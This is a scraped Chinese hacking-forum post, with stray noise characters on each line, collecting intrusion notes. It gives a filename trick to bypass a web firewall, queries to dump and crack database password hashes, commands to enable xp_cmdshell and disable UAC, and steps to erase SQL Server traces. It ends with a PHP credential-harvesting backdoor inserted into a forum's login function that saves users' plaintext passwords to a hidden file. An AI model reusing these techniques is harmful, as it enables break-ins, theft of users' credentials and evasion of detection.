) q1 b& j8 I+ @2 s其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录7 P& a4 R2 K3 Y" a$ \6 M* Z
利用II6文件解析漏洞绕过安全狗代码:; l9 q6 F! |5 @% n
;antian365.asp;antian365.jpg
. l$ K5 a0 p: q/ J( c5 c6 D- ], \5 G0 e( f; W
各种类型数据库抓HASH破解最高权限密码!( k$ ]; I$ f& X) b
1.sql server2000
/ }, U4 c* z% X6 o8 _2 p- ySELECT password from master.dbo.sysxlogins where name='sa'
: a; |3 W% s- L0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503416 ~: C) X' W9 w: t8 A
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
* ^6 c4 L' s9 ~/ Q6 O
: A0 t' a/ _' U Z- ?+ c4 A4 s0×0100- constant header, \. p+ a0 ^4 B$ }
34767D5C- salt
2 t, f7 d4 M- F& v0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
" @) t3 D+ c' Q% ]4 q/ g2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash1 R) \3 u% [# U& q. \
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
) ]( V; X5 @% _, }4 lSQL server 2005:-: E( n% f, o; b- J/ z+ F1 f
SELECT password_hash FROM sys.sql_logins where name='sa': `+ c2 @1 R( C" W) n: v
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
' F9 B0 v2 P- O9 N. L2 ]! B0×0100- constant header
# K! g0 R8 u7 [' H993BF231-salt& @& m% M$ B. S E) B+ c
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
9 ?3 M1 x+ K" K/ Q7 ~% acrack case sensitive hash in cain, try brute force and dictionary based attacks.; p) a0 J+ W" K
) E* y$ W! S, Z3 D5 o" }9 ?# K
update:- following bernardo’s comments:-9 O: q9 a0 G7 c2 C3 _' k" [
use function fn_varbintohexstr() to cast password in a hex string.) Q( A0 V, n! x1 _
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
9 R# ]- G* ]# r! A$ ?4 W l; `4 C3 }+ Q3 `
MYSQL:-
" }% {- ^+ L+ S# c6 s
! o0 g4 C8 N8 x' G/ m# a4 _In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2., s9 y+ M7 M6 u9 o* b
S6 S) l$ P: b5 V5 u. y
*mysql < 4.1# L" f8 ^$ n- k A& h! n
1 |# q; G" ^# ~1 _- Y" g' B' C* Hmysql> SELECT PASSWORD(‘mypass’);
& @: f; `7 ?5 U+——————–+8 H- U: w1 G/ G" C
| PASSWORD(‘mypass’) |; z" E$ L+ y' q
+——————–+
& g$ I; Q& K+ [ {6 j9 T| 6f8c114b58f2ce9e |4 e; n, N4 A) C/ v# R
+——————–+# n K. u: b2 P$ l' Y4 n3 L
) a/ w7 a3 q* v
*mysql >=4.1
0 ?; q+ K# K% N! E) B1 [; k2 w$ V# G! P; l8 U9 p6 C- v
mysql> SELECT PASSWORD(‘mypass’);
# \2 K8 Q4 F$ {! q. [+——————————————-+
2 o1 I0 ~( \1 N, r* B| PASSWORD(‘mypass’) |
1 |- z! @/ Q+ E: F7 T |' n+——————————————-+
/ V3 w! P I) Y| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |; b1 d: e3 f( |2 K- a
+——————————————-+% @& m a0 l6 X8 M% ^ Z! t
+ m- ], t5 D. q/ g+ ]& F) v
Select user, password from mysql.user% R5 B6 n" V: b& u
The hashes can be cracked in ‘cain and abel’8 O& T% N6 G$ Z- J, {. W
; {/ Z: s+ O% S2 LPostgres:-
4 a2 M4 i! ^1 }# w6 N" fPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
& f2 l3 Y0 R( Z# H/ F8 K' o. s& ?select usename, passwd from pg_shadow;
* C6 V0 F7 `$ D9 ^+ |usename | passwd
7 Y* k% U' F" x, \" N——————+————————————-+ b% z6 o G; I5 ^/ g' x L
testuser | md5fabb6d7172aadfda4753bf0507ed4396
* W+ x3 |6 @- u- J4 iuse mdcrack to crack these hashes:-
1 X% M1 j* n* i5 P- E( [) _$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
7 W4 K( b# S3 A9 e; Y K% C4 x) C
7 v6 M9 Y6 {, E: m. z# WOracle:-
1 B- u# a" ]3 L/ V' D" L. g3 {select name, password, spare4 from sys.user$6 o! n/ C! ]$ D% I# G/ i
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
' a6 Y% O% u1 B" A- v, D2 ^More on Oracle later, i am a bit bored….
c1 h# n3 P/ Y2 L& s# x1 Z8 R) k9 S# o- n
4 e! t5 ? b, i) F: X+ H
在sql server2005/2008中开启xp_cmdshell% V4 Y! m5 [5 z+ M& f! U `
-- To allow advanced options to be changed.; |! e3 }: U6 w2 N
EXEC sp_configure 'show advanced options', 1
) v1 r& r4 }+ l4 w+ q" U& s. K$ vGO$ ^; v: J0 T! M8 _* E% Q
-- To update the currently configured value for advanced options.9 l5 c# Y4 L7 L& Z
RECONFIGURE7 s: j- |% I# L% h
GO
0 p1 u8 g5 O) b ]9 D9 j-- To enable the feature.
. P( _: B5 f0 P# R, b2 V yEXEC sp_configure 'xp_cmdshell', 1
L* ]: [# s5 l6 X5 oGO
3 }6 [( f% P* p- p0 q: w2 G5 C8 e-- To update the currently configured value for this feature.
0 z4 ? Q! Z' {5 [RECONFIGURE# o" x: w7 A9 H& P" e* _
GO
2 h: e) S+ v* x6 d8 G- I- HSQL 2008 server日志清除,在清楚前一定要备份。' @9 m8 j) j" U7 t% Y! k8 \8 u
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
$ _8 Q1 t& M/ ?5 d8 l0 MX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin! s" A$ @5 A/ e% }" A6 i
" h' a3 V$ Z, Q0 ]6 N0 A: _9 v' @- V对于SQL Server 2008以前的版本:7 w& m) j8 l' S4 [# i& J) I
SQL Server 2005:( x* [4 S* ^" n9 h, @$ ^( P( s
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat& }& i- h6 H; q' s9 l& |& e
SQL Server 2000:
' a5 b' \) Z( W& s# a) m清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。8 r( `( I! b7 B k, ^
9 Z" b+ z1 I& _. }本帖最后由 simeon 于 2013-1-3 09:51 编辑
) l; ^/ s3 q, Y. l; D( [# m7 g0 m z: ]5 j5 X
. B/ }3 z$ g8 u2 V! E9 |windows 2008 文件权限修改
9 `& Q( ~ S$ T' u. A3 @! r1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
. c6 z) S4 o! z l2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98: B6 K. S% b% v: m J
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,- k1 u6 K7 I+ i9 \, i; R" q
! X6 J$ x+ i+ q' F& y7 B$ a. aWindows Registry Editor Version 5.00& x' i" I( [/ v$ j
[HKEY_CLASSES_ROOT\*\shell\runas]
% f6 }/ V+ }* @8 ^) B+ d@="管理员取得所有权"9 U$ T9 u3 S% P
"NoWorkingDirectory"=""
. }' m0 N& ]0 a[HKEY_CLASSES_ROOT\*\shell\runas\command]) Z- Z9 X ?2 Z+ @7 Y8 Q
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 J7 x$ x1 v% t) _6 |, y
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( g, M* Z% ?$ q[HKEY_CLASSES_ROOT\exefile\shell\runas2]
8 M2 E$ Y& i8 t@="管理员取得所有权"
* M* h4 H$ q7 e"NoWorkingDirectory"=""
- l8 F. N n8 u5 l ]4 I# |[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
& a# C( D N$ t) ]+ g@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"6 v: \7 i, d, C2 Z
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"; {' S" p0 u" z5 L8 z$ j
# f/ }) ?4 j& J/ Q[HKEY_CLASSES_ROOT\Directory\shell\runas]
/ a& P" M( c) G9 l; [2 P# x@="管理员取得所有权"
3 n5 i" D& A1 x3 T7 X"NoWorkingDirectory"=""
1 \& x/ q# |* i+ i& O" @[HKEY_CLASSES_ROOT\Directory\shell\runas\command]7 u" z, l! i! z# D" R8 G* _+ h3 e
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
5 a0 L5 R$ M5 i0 l% T6 ~, }+ N"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
+ n1 h+ {) f+ x$ `; [7 ~* K6 V4 S4 }' e4 w2 H
+ {8 C' x3 h& h
win7右键“管理员取得所有权”.reg导入
/ C; x2 I/ e& r/ _% B9 U二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,( d! k& a- o; u! y% m/ H
1、C:\Windows这个路径的“notepad.exe”不需要替换; o9 E) }5 \! q" |$ P* B
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
) W2 l I+ P: t$ w) }8 z3、四个“notepad.exe.mui”不要管
- [; H5 @& \+ O" {; Y4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
: u/ a! \2 ^0 i6 [8 FC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
% V% {1 X* z! s) e+ y8 U, h- P0 o4 J替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,( W& ]0 Y) d1 _4 k4 x% ?1 R
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
) P# ?# B: a5 X' v5 M2 ewindows 2008中关闭安全策略: , {. F; ]" ~1 |! Q/ T
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f/ m% H9 F+ V2 b9 u5 b( m
修改uc_client目录下的client.php 在 U5 z4 d/ N7 d% N
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') { a5 ]+ X9 l* [, K; [
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
9 S! k2 K4 z) V你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw9 m. ?9 F* V% Y4 u4 D( E
if(getenv('HTTP_CLIENT_IP')) {
: y1 G( ]9 z/ ^+ Q- ?5 U$onlineip = getenv('HTTP_CLIENT_IP');
4 t5 A3 K$ a0 q& Q, g} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
! W+ _/ W2 X% f& c# o$onlineip = getenv('HTTP_X_FORWARDED_FOR');
) c4 V! w7 S* |+ E. A/ R} elseif(getenv('REMOTE_ADDR')) {
. J, O% x( a* T$ ]3 s& Q$onlineip = getenv('REMOTE_ADDR');5 ^. ^$ e* n% ?' g' K
} else {
/ \3 a1 y n c! h; K, y7 n% v$ ?0 x$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];; P X* `. m! R8 n E/ l. h
}
# Y5 d8 h4 g& X Q $showtime=date("Y-m-d H:i:s");
0 p, {* `( @5 L* u5 q $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";, \* M/ A& k* X$ y& g: x6 }( X
$handle=fopen('./data/cache/csslog.php','a+');
+ a }! n2 J/ |7 \; u& K6 z $write=fwrite($handle,$record); |